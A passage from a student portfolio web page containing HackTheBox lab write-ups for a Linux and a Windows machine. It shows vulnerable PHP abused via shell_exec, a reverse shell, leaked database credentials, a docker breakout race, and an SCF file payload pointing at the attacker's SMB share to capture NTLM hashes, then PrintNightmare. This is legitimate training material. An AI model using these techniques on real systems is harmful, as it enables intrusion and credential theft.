                                                          //TODO: IMPLEMENT FILE VERIFICATION
                                                      }
                                                      elseif($_REQUEST['action'] === "hash_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE-HASHING
                                                      }
                                                      elseif($_REQUEST['action'] === "hash")
                                                      {
                                                          // HASHES $password USING $hash_function
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
                                                              if(!isset($_REQUEST['redirect']))
                                                              {
                                                                  echo "Result for Hash-function (" . $_REQUEST['hash_function'] . ") and password (" . $_REQUEST['password'] . "):&#x3C;br>";
                                                                  echo '&#x3C;br>' . $hash;
                                                                  return;
                                                              }
                                                              else
                                                              {
                                                                  $_SESSION['hash'] = $hash;
                                                                  header('Location: /home.php?tool=hashing');
                                                                  return;
                                                              }
                                                          }
                                                      }
                                                  }
                                                  // Action not set, ignore
                                                  throw new Exception("");
                                              }
                                              catch(Exception $ex)
                                              {
                                                  if($ex->getMessage() !== "")
                                                      $_SESSION['error'] = htmlentities($ex->getMessage());
          
                                                  header('Location: /home.php');
                                                  return;
                                              }
                                              ?>
                                          </code>
                                      </pre>
          <p>After analyzing the source code it looks like if you send the debug parameter as true and
          the hashing_function as shell_exec, you
          can run any shell command you want from the hashing tool. So lets try that.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png" alt=""></a>
          <p>Looks like it worked now lets try to get a reverse shell.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WWW-DataShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-DataShell.png" alt=""></a>
          <p>And we're in! I looked in the /etc/passwd and noticed another user named www-adm which
          looked like the next user I needed. After looking around for a bit and I couldn't find
          anything I thought what if they reused passwords?</p>
          <a href="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png" alt=""></a>
          <p>And they did so now we have www-adm shell. After looking around I noticed a .wgetrc file
          with some credentials in it. Because it looked like docker was running on the machine I
          thought http://api:5000/ was my best bet.</p>
          <a href="img/portfolio/minor/red/htb_linux/WGETAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETAPI.png" alt=""></a>
          <p>And it was! Apparently there is a check_db endpoint but it required credentials. So I
          tried to credentials we've just found.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatCheckDB.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatCheckDB.png" alt=""></a>
          <p>Looks like JSON but we first need to prettify it to make it more readable.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              {
             "message":{
                "AppArmorProfile":"docker-default",
                "Args":[
                   "--character-set-server=utf8mb4",
                   "--collation-server=utf8mb4_bin",
                   "--skip-character-set-client-handshake",
                   "--max_allowed_packet=50MB",
                   "--general_log=0",
                   "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                ],
                "Config":{
                   "AttachStderr":false,
                   "AttachStdin":false,
                   "AttachStdout":false,
                   "Cmd":[
                      "--character-set-server=utf8mb4",
                      "--collation-server=utf8mb4_bin",
                      "--skip-character-set-client-handshake",
                      "--max_allowed_packet=50MB",
                      "--general_log=0",
                      "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                   ],
                   "Domainname":"",
                   "Entrypoint":[
                      "docker-entrypoint.sh"
                   ],
                   "Env":[
                      "MYSQL_DATABASE=db",
                      "MYSQL_USER=drew",
                      "MYSQL_PASSWORD=drew",
                      "MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5",
                      "SERVICE_TAGS=dev",
                      "SERVICE_NAME=mysql",
                      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                      "GOSU_VERSION=1.12",
                      "MYSQL_MAJOR=8.0",
                      "MYSQL_VERSION=8.0.25-1debian10"
                   ],
                   "ExposedPorts":{
                      "3306/tcp":{
          
                      },
                      "33060/tcp":{
          
                      }
                   },
                   "Healthcheck":{
                      "Interval":5000000000,
                      "Retries":3,
                      "Test":[
                         "CMD-SHELL",
                         "mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"
                      ],
                      "Timeout":2000000000
                   },
                   "Hostname":"mysql",
                   "Image":"mysql:latest",
                   "Labels":{
                      "com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839",
                      "com.docker.compose.container-number":"1",
                      "com.docker.compose.oneoff":"False",
                      "com.docker.compose.project":"app",
                      "com.docker.compose.project.config_files":"docker-compose.yml",
                      "com.docker.compose.project.working_dir":"/root/app",
                      "com.docker.compose.service":"mysql",
                      "com.docker.compose.version":"1.29.1"
                   },
                   "OnBuild":null,
                   "OpenStdin":false,
                   "StdinOnce":false,
                   "Tty":true,
                   "User":"",
                   "Volumes":{
                      "/docker-entrypoint-initdb.d":{
          
                      },
                      "/var/lib/mysql":{
          
                      }
                   },
                   "WorkingDir":""
                },
                "Created":"2021-10-04T06:57:43.698655618Z",
                "Driver":"overlay2",
                "ExecIDs":null,
                "GraphDriver":{
                   "Data":{
                      "LowerDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff",
                      "MergedDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/merged",
                      "UpperDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/diff",
                      "WorkDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/work"
                   },
                   "Name":"overlay2"
                },
                "HostConfig":{
                   "AutoRemove":false,
                   "Binds":[
                      "/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro",
                      "app_vol_mysql:/var/lib/mysql:rw"
                   ],
                   "BlkioDeviceReadBps":null,
                   "BlkioDeviceReadIOps":null,
                   "BlkioDeviceWriteBps":null,
                   "BlkioDeviceWriteIOps":null,
                   "BlkioWeight":0,
                   "BlkioWeightDevice":null,
                   "CapAdd":[
                      "SYS_NICE"
                   ],
                   "CapDrop":null,
                   "Cgroup":"",
                   "CgroupParent":"",
                   "CgroupnsMode":"host",
                   "ConsoleSize":[
                      0,
                      0
                   ],
                   "ContainerIDFile":"",
                   "CpuCount":0,
                   "CpuPercent":0,
                   "CpuPeriod":0,
                   "CpuQuota":0,
                   "CpuRealtimePeriod":0,
                   "CpuRealtimeRuntime":0,
                   "CpuShares":0,
                   "CpusetCpus":"",
                   "CpusetMems":"",
                   "DeviceCgroupRules":null,
                   "DeviceRequests":null,
                   "Devices":null,
                   "Dns":null,
                   "DnsOptions":null,
                   "DnsSearch":null,
                   "ExtraHosts":null,
                   "GroupAdd":null,
                   "IOMaximumBandwidth":0,
                   "IOMaximumIOps":0,
                   "IpcMode":"private",
                   "Isolation":"",
                   "KernelMemory":0,
                   "KernelMemoryTCP":0,
                   "Links":null,
                   "LogConfig":{
                      "Config":{
          
                      },
                      "Type":"json-file"
                   },
                   "MaskedPaths":[
                      "/proc/asound",
                      "/proc/acpi",
                      "/proc/kcore",
                      "/proc/keys",
                      "/proc/latency_stats",
                      "/proc/timer_list",
                      "/proc/timer_stats",
                      "/proc/sched_debug",
                      "/proc/scsi",
                      "/sys/firmware"
                   ],
                   "Memory":0,
                   "MemoryReservation":0,
                   "MemorySwap":0,
                   "MemorySwappiness":null,
                   "NanoCpus":0,
                   "NetworkMode":"app_nw",
                   "OomKillDisable":false,
                   "OomScoreAdj":0,
                   "PidMode":"",
                   "PidsLimit":null,
                   "PortBindings":{
          
                   },
                   "Privileged":false,
                   "PublishAllPorts":false,
                   "ReadonlyPaths":[
                      "/proc/bus",
                      "/proc/fs",
                      "/proc/irq",
                      "/proc/sys",
                      "/proc/sysrq-trigger"
                   ],
                   "ReadonlyRootfs":false,
                   "RestartPolicy":{
                      "MaximumRetryCount":0,
                      "Name":"always"
                   },
                   "Runtime":"runc",
                   "SecurityOpt":null,
                   "ShmSize":67108864,
                   "UTSMode":"",
                   "Ulimits":null,
                   "UsernsMode":"",
                   "VolumeDriver":"",
                   "VolumesFrom":[
          
                   ]
                },
                "HostnamePath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hostname",
                "HostsPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hosts",
                "Id":"47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216",
                "Image":"sha256:5c62e459e087e3bd3d963092b58e50ae2af881076b43c29e38e2b5db253e0287",
                "LogPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216-json.log",
                "MountLabel":"",
                "Mounts":[
                   {
                      "Destination":"/docker-entrypoint-initdb.d",
                      "Mode":"ro",
                      "Propagation":"rprivate",
                      "RW":false,
                      "Source":"/root/app/scripts/init.d",
                      "Type":"bind"
                   },
                   {
                      "Destination":"/var/lib/mysql",
                      "Driver":"local",
                      "Mode":"rw",
                      "Name":"app_vol_mysql",
                      "Propagation":"",
                      "RW":true,
                      "Source":"/var/lib/docker/volumes/app_vol_mysql/_data",
                      "Type":"volume"
                   }
                ],
                "Name":"/mysql",
                "NetworkSettings":{
                   "Bridge":"",
                   "EndpointID":"",
                   "Gateway":"",
                   "GlobalIPv6Address":"",
                   "GlobalIPv6PrefixLen":0,
                   "HairpinMode":false,
                   "IPAddress":"",
                   "IPPrefixLen":0,
                   "IPv6Gateway":"",
                   "LinkLocalIPv6Address":"",
                   "LinkLocalIPv6PrefixLen":0,
                   "MacAddress":"",
                   "Networks":{
                      "app_nw":{
                         "Aliases":[
                            "47c78eb0450f",
                            "mysql"
                         ],
                         "DriverOpts":null,
                         "EndpointID":"50037fb137fd880f88a9efd17eb8cf94bf8142ec263080b4c904afeeaa79aa2e",
                         "Gateway":"172.18.0.1",
                         "GlobalIPv6Address":"",
                         "GlobalIPv6PrefixLen":0,
                         "IPAMConfig":{
                            "IPv4Address":"172.18.0.100"
                         },
                         "IPAddress":"172.18.0.100",
                         "IPPrefixLen":16,
                         "IPv6Gateway":"",
                         "Links":null,
                         "MacAddress":"02:42:ac:12:00:64",
                         "NetworkID":"021b24b8b3e1e3638463eeb7dc9af59c36cc412578cdf51931a24f04ea6f5532"
                      }
                   },
                   "Ports":{
                      "3306/tcp":null,
                      "33060/tcp":null
                   },
                   "SandboxID":"99cbb57fded2142e5dad46330b43249d2866f8514fb4342d06322f3e3b5c60f1",
                   "SandboxKey":"/var/run/docker/netns/99cbb57fded2",
                   "SecondaryIPAddresses":null,
                   "SecondaryIPv6Addresses":null
                },
                "Path":"docker-entrypoint.sh",
                "Platform":"linux",
                "ProcessLabel":"",
                "ResolvConfPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/resolv.conf",
                "RestartCount":0,
                "State":{
                   "Dead":false,
                   "Error":"",
                   "ExitCode":0,
                   "FinishedAt":"0001-01-01T00:00:00Z",
                   "Health":{
                      "FailingStreak":0,
                      "Log":[
                         {
                            "End":"2021-10-04T17:08:01.998027574+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:01.908189033+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:07.080804898+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:07.000613396+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:12.166584919+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:12.083845791+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:17.254375293+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:17.16894306+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:22.350400823+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:22.257747436+02:00"
                         }
                      ],
                      "Status":"healthy"
                   },
                   "OOMKilled":false,
                   "Paused":false,
                   "Pid":1108,
                   "Restarting":false,
                   "Running":true,
                   "StartedAt":"2021-10-04T06:57:47.409835076Z",
                   "Status":"running"
                }
             },
             "status":200
          }
                                          </code>
                                      </pre>
          <p>Looks like an username and some passwords lets try those with ssh.</p>
          <a href="img/portfolio/minor/red/htb_linux/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/UserFlag.png" alt=""></a>
          <p>We got the user flag! But now we need to find something to escalate our privileges. We
          could use LinPEAS to try and find something but we first have to get it on this
          machine.</p>
          <a href="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WGETLinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETLinpeas.png" alt=""></a>
          <p>I used SimpleHTTPServer to get LinPeas from my machine to the target machine because the
          target machine didn't have access to the internet. Now we need to run LinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasMail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasMail.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png" alt=""></a>
          <p>Looks like LinPEAS found some interesting stuff like a mail message to Drew and the
          docker ip ranges and a docker folder that is edited regularly.</p>
          <a href="img/portfolio/minor/red/htb_linux/Mail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Mail.png" alt=""></a>
          <p>This probably means that the docker folder that gets edited regularly is the folder
          containing the game. And that some script is running that we could use.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>Looks like we got a public key as game-tester as well. Lets try to login into the docker
          ips using this public key.</p>
          <a href="img/portfolio/minor/red/htb_linux/Game-testerShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Game-testerShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png" alt=""></a>
          <p>And it worked now we got a shell as game-tester as well on a docker container. I noticed
          that the same docker folder on Drew also exists on the docker container and that they
          are shared. I also noticed that the docker folder get rewritten entirely so all files
          inside get removed and replaced before the server is restarted again. Lets see what the
          script does.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatNode-server.png" alt=""></a>
          <p>It runs in a folder called /usr/src/app which doesn't exist on the Drew user but it does
          on the game-tester container. So lets look at that as well.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatServerJS.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatServerJS.png" alt=""></a>
          <p>Look like we can crash the server if we make a POST to autoplay with a decimal instead of
          an integer. But that doesn't get us anywhere we need to infect the node-server.sh
          first.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>I found this <a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout">website</a>
          explaining priv esc with docker so I gave it a try. But I have to be faster than the
          server can create the node-server.sh in order to infect it. So I created a script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RogueNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RogueNode-server.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/ExploitLoop.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitLoop.png" alt=""></a>
          <p>This should create a bash file in /tmp on the game-tester container that is executable by
          game-tester in order to priv esc. So lets crash the server and try it.</p>
          <a href="img/portfolio/minor/red/htb_linux/ExploitRun.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitRun.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/CrashGameServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CrashGameServer.png" alt=""></a>
          <p>I had to give it a few tries in order to succeed because in some cases the server was
          actually faster than my script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RootOnDocker.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootOnDocker.png" alt=""></a>
          <p>And it worked now we need to do the same thing in order to get root on the Drew machine
          but this time we don't have to worry about speed because we don't need to infect a
          script, we just have to do it fast enough before all the files inside the folder get
          deleted again.</p>
          <a href="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootFlag.png" alt=""></a>
          <p>That's it! We are root and got the flag!</p>
          <p>Although it took me quite a while to root this machine it was a really fun one.
          Containing a lot of different exploits mostly straight from the OWASP top 10 but also
          some I never heard of before like the docker priv esc.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal22" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Windows Write-up</p>
          <a href="img/portfolio/minor/red/htb_windows/DriverCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/DriverCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <a href="img/portfolio/minor/red/htb_windows/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/NMapOutput.png" alt=""></a>
          <p>When navigating to the webpage we are greeted by a login screen. After some searching and
          not finding anything useful I tried to login with just a default password admin:admin it
          was a longshot but it worked!</p>
          <a href="img/portfolio/minor/red/htb_windows/Dashboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/Dashboard.png" alt=""></a>
          <p>The only button that worked on the website was Firmware updates where you can upload a
          file. Knowing that SMB was also an open port I found this <a href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/">website</a>
          this could potentially it so lets try it out.
          </p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              [Shell]
                                              Command=2
                                              Iconfile=\\10.10.14.161\share\test.ico
                                              [Taskbar]
                                              Command=ToggleDesktop
                                          </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_windows/ResponderOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ResponderOutput.png" alt=""></a>
          <p>I created a payload like the example given on the site I found started responder and got
          a few hits. Now we know the username and maybe the password if we manage to crack
          it. We know from the responder output that it is a NTLM hash so lets put Hashcat on it
          and see what we'll get.</p>
          <a href="img/portfolio/minor/red/htb_windows/HashcatOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/HashcatOutput.png" alt=""></a>
          <p>Hashcat cracked the password with ease and now we can take a look at the SMB folder to
          see if we can find anything interesting.</p>
          <a href="img/portfolio/minor/red/htb_windows/SMBMap.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SMBMap.png" alt=""></a>
          <p>We didn't find anything interesting but knowing from the NMap output we also know that
          the RDP port is open so maybe it uses the same password.</p>
          <a href="img/portfolio/minor/red/htb_windows/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/UserFlag.png" alt=""></a>
          <p>This was indeed the case and now we already have the user flag. For priv esc running at
          least WinPEAS is a no-brainer. So I used SimpleHTTPServer to get WinPEAS on the target
          machine.</p>
          <a href="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/WgetWinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetWinpeas.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png" alt=""></a>
          <p>Really the only interesting thing WinPEAS found was a Print spooler process. After some
          Googling I stubled across <a href="https://github.com/calebstewart/CVE-2021-1675">this</a> CVE. So lets get
          that exploit on the target machine in the same way we did with WinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png" alt=""></a>
          <p>I wasn't able to run the script because of some permission issues, but after some
          Googling I found out I could just set the policy to unrestricted.</p>
          <a href="img/portfolio/minor/red/htb_windows/RunExploit.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RunExploit.png" alt=""></a>
          <p>I ran the exploit and it created a new administrator account for me with a username and
          password that I chose and know. Now the only thing that's left is just to logout as this
          user and login with our new user.</p>
          <a href="img/portfolio/minor/red/htb_windows/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RootFlag.png" alt=""></a>
          <p>And that's it! We have the root flag! This box wasn't that hard but still fun and
          sometimes challenging due to my lack of knowledge of Windows hacking. Overall a fun
          learning experience.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal24" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal25" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">My personal pen-testing toolboxes</p>
          <p>Like every other profession good tools make a world of difference on the quality and
          efficiency of the end product. This isn't any different with cyber security. Good tools
          can improve results providing you with more information and helping with getting to the
          results faster.</p>
          <h3>On the road</h3>
          <a href="img/portfolio/minor/red/kalilinux.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/kalilinux.jpg" alt=""></a>
          <p>On the road when I'm on my laptop I like to use Kali Linux. It's just convenient that it
          comes pre-loaded with all the tools you need, and it runs fairly lightweight on older
          laptops. The "kali-undercover" command is also a fun little gimmick that changes your
          Kali desktop to a Windows clone which for a random passer by looks just like a regular
          Windows machine. Making it incognito to use Kali whenever you're in a public space and
          want to keep a low profile.</p>
          <h3>At home</h3>
          <a href="img/portfolio/minor/red/parrotos.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/parrotos.jpg" alt=""></a>
          <p>At home on my main desktop PC I recently switched to natively running ParrotOS. This was
          because I liked to try something new and the reviews were good. It comes pre-loaded with
